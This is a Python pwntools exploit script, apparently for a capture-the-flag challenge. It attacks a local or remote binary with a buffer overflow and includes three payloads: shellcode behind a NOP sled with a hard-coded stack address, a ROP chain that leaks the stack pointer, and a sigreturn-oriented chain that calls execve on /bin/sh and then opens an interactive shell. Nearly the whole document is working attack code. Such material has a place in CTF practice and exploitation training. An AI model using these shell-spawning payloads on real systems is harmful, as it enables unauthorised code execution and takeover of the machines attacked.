from pwn import *  # Import pwntools
from pprint import pprint

def connect(args):
    # Establish either a local or remote connection
    if args.remote and args.host and args.port:
        conn = remote(args.host, args.port)
        print(f"Connecting to {args.host}:{args.port}")
    elif args.local and args.binary:
        conn = process(args.binary)
        print(f"Launching local binary: {args.binary}")
    else:
        print("Error: You must specify either --remote with host and port or --local with a binary path.")
        return
    return conn

def main():
    import argparse
    parser = argparse.ArgumentParser(description="CTF Exploit Script")
    parser.add_argument("--remote", action="store_true", help="Use remote connection")
    parser.add_argument("--host", type=str, help="Remote host")
    parser.add_argument("--port", type=int, help="Remote port")
    parser.add_argument("--local", action="store_true", help="Run local binary")
    parser.add_argument("--binary", type=str, help="Path to local binary")
    parser.add_argument("--debug", action="store_true", help="Enable debugging")
    args = parser.parse_args()

    #conn = connect(args)

    if args.debug:
        context.log_level = 'debug'

    elf = ELF(args.binary, checksec=False)
    context.arch = 'amd64'
    context.terminal = ['tmux', 'splitw', '-h']

    if args.debug:
        conn = gdb.debug(args.binary, 'b *0x000043017\ncontinue')
    else:
        conn = connect(args)

    def payload_shell(conn):
        rsp_addr = p64(0x00007fffffffe2c8)
        shellcode = asm(shellcraft.amd64.linux.sh())
        nop_sled = asm('nop') * (262 - len(shellcode) - 8*2)
        payload = b'x'*8 + rsp_addr + nop_sled + shellcode
        conn.send(payload)

    def payload_leak_rsp(conn):
        syscall = 0x0000000000043015
        rop = ROP(elf)
        rop.rax = 1
        rop.raw(rop.syscall.address)
        print(rop.dump())
        conn.send(b'x'*8 + rop.chain() + b'\n')

    def payload_srop(conn):
        rop = ROP(elf)
        frame = SigreturnFrame(kernel='amd64')
        bin_sh = 0x0000000000043238 # addr of /bin/sh
        frame.rax = constants.SYS_execve
        frame.rsi = 0
        frame.rdi = bin_sh
        frame.rcx = 0
        frame.rdx = 0
        frame.rip = rop.syscall.address
        rop.rax = 0xf
        rop.raw(rop.syscall.address)
        conn.send(b'x'*8 + rop.chain() + bytes(frame))

    payload_srop(conn)
    conn.interactive()
    exit(0)

    #shellcode = asm(shellcraft.amd64.linux.sh())

if __name__ == "__main__":
    main()

